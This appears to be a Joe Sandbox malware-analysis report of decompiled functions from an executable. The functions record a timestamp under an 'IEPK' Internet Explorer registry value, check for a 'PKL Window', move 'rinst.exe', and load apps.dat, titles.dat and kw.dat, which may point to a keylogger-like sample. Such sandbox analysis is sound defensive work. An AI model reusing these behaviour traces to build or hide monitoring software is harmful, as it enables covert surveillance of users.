    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#540$#1997#350#5194#533#5465#798#860H_prolog
    • String ID: X/D$|TD
    • API String ID: 1664639088-184714560
    • Opcode ID: 4c29f29bdd2297cf518f0958a3a76ce92e634682f83e5033b53928dcef3b63a3
    • Instruction ID: 11dbde24d47844cf365c44b46d799d62ff820dd3122949b2a81fb83ac5538a75
    • Opcode Fuzzy Hash: 4c29f29bdd2297cf518f0958a3a76ce92e634682f83e5033b53928dcef3b63a3
    • Instruction Fuzzy Hash: A431A470D01249DADF15EBA6D9456EEBBB4AF68308F60415EE412732C2DB780B09CB29
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 80%
    			_entry_(void* __ebx, void* __edi, void* __esi) {
    				CHAR* _v8;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				struct _STARTUPINFOA _v96;
    				int _v100;
    				char** _v104;
    				int _v108;
    				void _v112;
    				char _v116;
    				intOrPtr* _v120;
    				intOrPtr _v124;
    				intOrPtr* _t23;
    				intOrPtr* _t24;
    				void* _t27;
    				void _t29;
    				intOrPtr _t36;
    				signed int _t38;
    				int _t40;
    				intOrPtr* _t41;
    				intOrPtr _t42;
    				intOrPtr _t46;
    				intOrPtr _t47;
    				intOrPtr _t49;
    				intOrPtr* _t55;
    				intOrPtr _t58;
    				intOrPtr _t61;
    
    				_push(0xffffffff);
    				_push(0x44a588);
    				_push(0x43e91e);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t58;
    				_v28 = _t58 - 0x68;
    				_v8 = 0;
    				__set_app_type(2);
    				 *0x455c18 =  *0x455c18 | 0xffffffff;
    				 *0x455c1c =  *0x455c1c | 0xffffffff;
    				_t23 = __p__fmode();
    				_t46 =  *0x455bf8; // 0x0
    				 *_t23 = _t46;
    				_t24 = __p__commode();
    				_t47 =  *0x455bf4; // 0x0
    				 *_t24 = _t47;
    				 *0x455c14 = _adjust_fdiv;
    				_t27 = L00414D98( *_adjust_fdiv);
    				_t61 =  *0x4550a0; // 0x1
    				if(_t61 == 0) {
    					__setusermatherr(E0043E948);
    				}
    				E0043E936(_t27);
    				_push(0x453078);
    				_push(0x453074);
    				L0043E930();
    				_t29 =  *0x455bf0; // 0x0
    				_v112 = _t29;
    				_t6 =  &_v116; // 0x453078
    				__getmainargs( &_v100, _t6,  &_v104,  *0x455bec,  &_v112);
    				_push(0x453070);
    				_push(0x453000); // executed
    				L0043E930(); // executed
    				_t55 =  *_acmdln;
    				_v120 = _t55;
    				if( *_t55 != 0x22) {
    					while( *_t55 > 0x20) {
    						_t55 = _t55 + 1;
    						_v120 = _t55;
    					}
    				} else {
    					do {
    						_t55 = _t55 + 1;
    						_v120 = _t55;
    						_t42 =  *_t55;
    					} while (_t42 != 0 && _t42 != 0x22);
    					if( *_t55 == 0x22) {
    						L6:
    						_t55 = _t55 + 1;
    						_v120 = _t55;
    					}
    				}
    				_t36 =  *_t55;
    				if(_t36 != 0 && _t36 <= 0x20) {
    					goto L6;
    				}
    				_v96.dwFlags = 0;
    				GetStartupInfoA( &_v96);
    				if((_v96.dwFlags & 0x00000001) == 0) {
    					_t38 = 0xa;
    				} else {
    					_t38 = _v96.wShowWindow & 0x0000ffff;
    				}
    				_t40 = E0043EBEA(GetModuleHandleA(0), _t39, 0, _t55, _t38);
    				_v108 = _t40;
    				exit(_t40);
    				_t41 = _v24;
    				_t49 =  *((intOrPtr*)( *_t41));
    				_v124 = _t49;
    				_push(_t41);
    				_push(_t49);
    				L0043E92A();
    				return _t41;
    			}

    Instruction addresses (one per decompiled line, in listing order; 0x00000000 marks a line with no address of its own):
    0x0043e7b1 0x0043e7b3 0x0043e7b8 0x0043e7c3 0x0043e7c4 0x0043e7d1 0x0043e7d6 0x0043e7db 0x0043e7e2 0x0043e7e9
    0x0043e7f0 0x0043e7f6 0x0043e7fc 0x0043e7fe 0x0043e804 0x0043e80a 0x0043e813 0x0043e818 0x0043e81d 0x0043e823
    0x0043e82a 0x0043e830 0x0043e831 0x0043e836 0x0043e83b 0x0043e840 0x0043e845 0x0043e84a 0x0043e85b 0x0043e863
    0x0043e869 0x0043e86e 0x0043e873 0x0043e880 0x0043e882 0x0043e888 0x0043e8c4 0x0043e8c9 0x0043e8ca 0x0043e8ca
    0x0043e88a 0x0043e88a 0x0043e88a 0x0043e88b 0x0043e88e 0x0043e890 0x0043e89b 0x0043e89d 0x0043e89d 0x0043e89e
    0x0043e89e 0x0043e89b 0x0043e8a1 0x0043e8a5 0x00000000 0x00000000 0x0043e8ab 0x0043e8b2 0x0043e8bc 0x0043e8d1
    0x0043e8be 0x0043e8be 0x0043e8be 0x0043e8dd 0x0043e8e2 0x0043e8e6 0x0043e8ec 0x0043e8f1 0x0043e8f3 0x0043e8f6
    0x0043e8f7 0x0043e8f8 0x0043e8ff

    Memory Dump Source
    • Source File: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
    • String ID: x0E
    • API String ID: 801014965-2085839638
    • Opcode ID: e7dd650148b2fe74a2056c2f5baa759a34c30b5d846dd67d4226bd3d2f355def
    • Instruction ID: 89c94ea11fe09d787872c420172ef89c5e72238c03ee7e205053d29131b361ca
    • Opcode Fuzzy Hash: e7dd650148b2fe74a2056c2f5baa759a34c30b5d846dd67d4226bd3d2f355def
    • Instruction Fuzzy Hash: 084192B5C41304AFDB24AFA5D845BAEBBB8FB0A711F20112BF451972E2C7385941CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph: node 72, 403e5a-403e64, #537; node 73, 403e69-403eb4, #537 * 5; edge 72->73
    C-Code - Quality: 42%
    			E00403E5A(void* __eax) {
    
    				_push("None");
    				L0043DE26(); // executed
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    Instruction addresses (one per decompiled line, in listing order):
    0x00403e5a 0x00403e64 0x00403e69 0x00403e73 0x00403e78 0x00403e82 0x00403e87 0x00403e91 0x00403e96 0x00403ea0
    0x00403ea5 0x00403eaf 0x00403eb4

    APIs
    • #537.MFC42(None,00403E55), ref: 00403E64
    • #537.MFC42(User defined), ref: 00403E73
    • #537.MFC42(Open,User defined), ref: 00403E82
    • #537.MFC42(Print,Open,User defined), ref: 00403E91
    • #537.MFC42(Explore,Print,Open,User defined), ref: 00403EA0
    • #537.MFC42(E-mail,Explore,Print,Open,User defined), ref: 00403EAF
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-3616938308
    • Opcode ID: 959191443967752294bf1c8485ad417a71694dd1c26598fc0b660d6dde99f856
    • Instruction ID: 64710185d3577561e7c7c7004b869488be4ffdb627771f0b9110906d498d8a1a
    • Opcode Fuzzy Hash: 959191443967752294bf1c8485ad417a71694dd1c26598fc0b660d6dde99f856
    • Instruction Fuzzy Hash: 70D0AC00F44E519646147E65E43363D5C42DB9CBC7B90E15FBE011E1D38D8C4A5C456D
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 74 41b04d-41b0a9 call 41b133 time RegCreateKeyA RegQueryValueExA 77 41b0b2-41b0b5 74->77 78 41b0ab 74->78 79 41b0b7-41b0bb 77->79 80 41b0bd 77->80 78->77 79->80 81 41b0c0-41b0df difftime fabs 79->81 80->81 82 41b0e1-41b0e4 81->82 83 41b0e6-41b101 floor _ftol 81->83 82->83 84 41b121 82->84 85 41b103 83->85 86 41b106-41b11f RegSetValueExA 83->86 87 41b123-41b132 RegCloseKey 84->87 85->86 86->87
    C-Code - Quality: 48%
    			E0041B04D(signed long long __fp0) {
    				void* _v8;
    				int _v12;
    				char _v16;
    				int _v20;
    				int _v24;
    				void* _v28;
    				char _v32;
    				long _t34;
    				void* _t43;
    				char* _t47;
    				signed long long* _t48;
    				void* _t51;
    				signed long long _t54;
    
    				_t54 = __fp0;
    				E0041B133( &_v32);
    				_v12 = 0;
    				__imp__time( &_v16);
    				_v20 = 8;
    				_v24 = 0;
    				RegCreateKeyA(0x80000001, "Software\\Microsoft\\Internet Explorer",  &_v8); // executed
    				_t47 = "IEPK";
    				_t34 = RegQueryValueExA(_v8, _t47, 0,  &_v24,  &_v32,  &_v20); // executed
    				if(_t34 == 0) {
    					_v12 = 1;
    				}
    				if(_v28 <= 0) {
    					L4:
    					_v28 = 0;
    				} else {
    					_t51 = _v28 - 5;
    					if(_t51 > 0) {
    						goto L4;
    					}
    				}
    				__imp__difftime(_v16, _v32);
    				 *_t48 = _t54;
    				L0043E7A2();
    				asm("fcom qword [0x448138]");
    				_pop(_t43);
    				asm("fnstsw ax");
    				asm("sahf");
    				if(_t51 > 0 || _v12 == 0) {
    					 *_t48 = _t54 /  *0x448138;
    					__imp__floor(_t43, _t43);
    					L0043E7A8();
    					_t18 =  &_v28;
    					 *_t18 = _v28 - _t34;
    					if( *_t18 < 0) {
    						_v28 = 0;
    					}
    					_v32 = _v16;
    					RegSetValueExA(_v8, _t47, 0, 3,  &_v32, 8); // executed
    				} else {
    					st0 = _t54;
    				}
    				RegCloseKey(_v8); // executed
    				return _v28;
    			}

    APIs
      • Part of subcall function 0041B133: memset.MSVCRT ref: 0041B13B
      • Part of subcall function 0041B133: time.MSVCRT ref: 0041B141
    • time.MSVCRT ref: 0041B066
    • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer,?), ref: 0041B085
    • RegQueryValueExA.KERNELBASE(?,IEPK,00000000,?,?,00000008), ref: 0041B0A1
    • difftime.MSVCRT ref: 0041B0C6
    • fabs.MSVCRT ref: 0041B0CF
    • floor.MSVCRT ref: 0041B0F1
    • _ftol.MSVCRT ref: 0041B0F9
    • RegSetValueExA.KERNELBASE(?,IEPK,00000000,00000003,00000008,00000008), ref: 0041B119
    • RegCloseKey.KERNELBASE(?), ref: 0041B126
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Valuetime$CloseCreateQuery_ftoldifftimefabsfloormemset
    • String ID: IEPK$Software\Microsoft\Internet Explorer
    • API String ID: 3648909903-794077097
    • Opcode ID: 054e1dab8a170a6eec95439f53497395ea0cf1d95403ba9bfc77f9d2b517b44e
    • Instruction ID: dd149e372030552be21860354a8f79e15778c8bb59483b7b631a6047370fe913
    • Opcode Fuzzy Hash: 054e1dab8a170a6eec95439f53497395ea0cf1d95403ba9bfc77f9d2b517b44e
    • Instruction Fuzzy Hash: 40217A75C00209EFDB11AF91EC89AEFBFB8FF85355F20406BE151A1190DB391A85DB98
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 73%
    			E0041FE1D(intOrPtr* __ecx, void* __eflags, void* __fp0) {
    				struct HWND__* _t20;
    				intOrPtr _t22;
    				struct HWND__* _t26;
    				void* _t33;
    				void* _t35;
    				int _t36;
    				struct HWND__* _t37;
    				intOrPtr* _t39;
    				intOrPtr* _t47;
    				void* _t52;
    				void* _t57;
    
    				_t57 = __eflags;
    				_t39 = __ecx;
    				E0043E4E0(0x441e27, _t52);
    				E0043E690(0x37f0, __ecx);
    				_t47 = _t39; // executed
    				E0041FF1D(_t57); // executed
    				_t20 = FindWindowA(0, "PKL Window"); // executed
    				if(_t20 == 0) {
    					E00428827();
    					_t22 = E00428AD2(__eflags);
    					 *0x4558cc = _t22; // executed
    					L0043E44A(); // executed
    					_t36 = 8;
    					memset(_t52 - 0x14, 0, _t36);
    					 *(_t52 - 0x14) = _t36;
    					 *((intOrPtr*)(_t52 - 0x10)) = 0x2ff;
    					__imp__InitCommonControlsEx(_t52 - 0x14, 0, _t35);
    					_push(0);
    					_push(0xefefef);
    					L0043E444(); // executed
    					_t26 = GetForegroundWindow(); // executed
    					_t37 = _t26; // executed
    					E00420972(_t52 - 0x37fc, __eflags, __fp0, 0); // executed
    					_push(0);
    					_push(0x66);
    					 *(_t52 - 4) = 0;
    					 *((intOrPtr*)(_t47 + 0x20)) = _t52 - 0x37fc;
    					L0043E0BA(); // executed
    					__eflags = IsWindow(_t37);
    					if(__eflags != 0) {
    						SetForegroundWindow(_t37);
    					}
    					 *((intOrPtr*)( *_t47 + 0x5c))();
    					 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
    					E00420C62(_t52 - 0x37fc, __eflags);
    					_t33 = 0;
    					__eflags = 0;
    				} else {
    					_t33 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
    				return _t33;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041FE22
      • Part of subcall function 0041FF1D: __EH_prolog.LIBCMT ref: 0041FF22
      • Part of subcall function 0041FF1D: #924.MFC42(?,004558C8,rinst.exe), ref: 0041FF53
      • Part of subcall function 0041FF1D: #800.MFC42(?,004558C8,rinst.exe), ref: 0041FF6D
      • Part of subcall function 0041FF1D: #924.MFC42(?,004558C8,rinst.exe,?,004558C8,rinst.exe), ref: 0041FF7C
      • Part of subcall function 0041FF1D: MoveFileA.KERNEL32 ref: 0041FF8A
      • Part of subcall function 0041FF1D: #800.MFC42 ref: 0041FF93
    • FindWindowA.USER32 ref: 0041FE42
    • #1247.MFC42(00000000), ref: 0041FE64
    • memset.MSVCRT ref: 0041FE72
    • InitCommonControlsEx.COMCTL32(?), ref: 0041FE88
    • #5943.MFC42(00EFEFEF,00000000), ref: 0041FE96
    • GetForegroundWindow.USER32(00EFEFEF,00000000), ref: 0041FE9B
    • #2086.MFC42(00000066,00000000,00000000), ref: 0041FEC4
    • IsWindow.USER32(00000000), ref: 0041FECA
    • SetForegroundWindow.USER32(00000000), ref: 0041FED5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#800#924ForegroundH_prolog$#1247#2086#5943CommonControlsFileFindInitMovememset
    • String ID: PKL Window
    • API String ID: 1413088479-2321334418
    • Opcode ID: 974c1365f4282ca79d03f2d9861de1b0a566cf65b3c0a2acc5b3228025964557
    • Instruction ID: caff68ceb3a8d2f4b609b75cc9c9dbe2ddcdf9559007ec67d11399ce8f7a5a3c
    • Opcode Fuzzy Hash: 974c1365f4282ca79d03f2d9861de1b0a566cf65b3c0a2acc5b3228025964557
    • Instruction Fuzzy Hash: 7621DAB5A01316AFC710FBB2DC4A9AFBB78FF48354F10443BB005D2192DB788A04CA69
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 52%
    			E0042211B(void* __ecx, void* __eflags) {
    				void* _t28;
    				void* _t43;
    
    				E0043E4E0(0x442378, _t43);
    				_push(__ecx);
    				_push(__ecx);
    				_push("apps.dat");
    				_push(0x4558c8);
    				_push(_t43 - 0x10);
    				L0043DE20();
    				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
    				E00428731(__ecx + 0x3e8,  *((intOrPtr*)(_t43 - 0x10))); // executed
    				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
    				L0043DD36();
    				_push("titles.dat");
    				_push(0x4558c8);
    				_push(_t43 - 0x10);
    				L0043DE20();
    				 *(_t43 - 4) = 1;
    				E00428731(__ecx + 0x89c,  *((intOrPtr*)(_t43 - 0x10))); // executed
    				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
    				L0043DD36();
    				_push("kw.dat");
    				_push(0x4558c8);
    				_push(_t43 - 0x14);
    				L0043DE20();
    				 *(_t43 - 4) = 2;
    				_t28 = E00428731(__ecx + 0x1204,  *((intOrPtr*)(_t43 - 0x14))); // executed
    				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
    				return _t28;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00422120
    • #924.MFC42(?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 0042213A
      • Part of subcall function 00428731: __EH_prolog.LIBCMT ref: 00428736
      • Part of subcall function 00428731: #533.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428746
      • Part of subcall function 00428731: #350.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428753
      • Part of subcall function 00428731: #540.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042875F
      • Part of subcall function 00428731: #860.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042877B
      • Part of subcall function 00428731: #540.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428787
      • Part of subcall function 00428731: #5194.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042879B
      • Part of subcall function 00428731: #5465.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287AB
      • Part of subcall function 00428731: #1997.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287C9
      • Part of subcall function 00428731: #800.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287D5
      • Part of subcall function 00428731: #800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287FC
      • Part of subcall function 00428731: #798.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042880F
    • #800.MFC42(00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 00422157
    • #924.MFC42(?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 00422166
      • Part of subcall function 00428731: #800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287ED
    • #800.MFC42(00000000,?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20,?,00000000,00000000), ref: 00422186
    • #924.MFC42(?,004558C8,kw.dat,00000000,?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8,?,?,?,00420B20), ref: 00422195
    • #800.MFC42(00000000,?,004558C8,kw.dat,00000000,?,004558C8,titles.dat,00000000,?,004558C8,apps.dat,004558C8), ref: 004221B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#924$#540H_prolog$#1997#350#5194#533#5465#798#860
    • String ID: apps.dat$kw.dat$titles.dat$x#D
    • API String ID: 130924112-1639675152
    • Opcode ID: 194966762dea3a33e290ea1194b6e2799e2960421b3c2f96fd8797e038408eee
    • Instruction ID: 4fdbcaa8750ee0019b169620ce86efcfb64211fc8a04741e778e3f296c24d19e
    • Opcode Fuzzy Hash: 194966762dea3a33e290ea1194b6e2799e2960421b3c2f96fd8797e038408eee
    • Instruction Fuzzy Hash: CA119130901515EBCB14EFA1DD06AEEFB78EF19368F20461EB021630D1DB782A14DA68
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 118 403e2f-403e31 119 403e33-403e3b 118->119 120 403e57-403e64 #537 118->120 121 403e69-403eb4 #537 * 5 120->121
    C-Code - Quality: 51%
    			E00403E2F(signed int __eax, void* __ebx, signed int __ecx, void* __edi) {
    
    				if(__ebx == 0) {
    					 *__eax =  *__eax + __eax;
    					 *((intOrPtr*)(__eax + 0x34)) =  *((intOrPtr*)(__eax + 0x34)) + __ecx;
    					_push("None");
    					L0043DE26(); // executed
    					_push("User defined");
    					L0043DE26();
    					_push("Open");
    					L0043DE26();
    					_push("Print");
    					L0043DE26();
    					_push("Explore");
    					L0043DE26();
    					_push("E-mail");
    					L0043DE26();
    					return __eax;
    				} else {
    					asm("stosb");
    					return (__eax | __ecx) +  *(__eax | __ecx);
    				}
    			}

    APIs
    • #537.MFC42(None,00403E55), ref: 00403E64
    • #537.MFC42(User defined), ref: 00403E73
    • #537.MFC42(Open,User defined), ref: 00403E82
    • #537.MFC42(Print,Open,User defined), ref: 00403E91
    • #537.MFC42(Explore,Print,Open,User defined), ref: 00403EA0
    • #537.MFC42(E-mail,Explore,Print,Open,User defined), ref: 00403EAF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
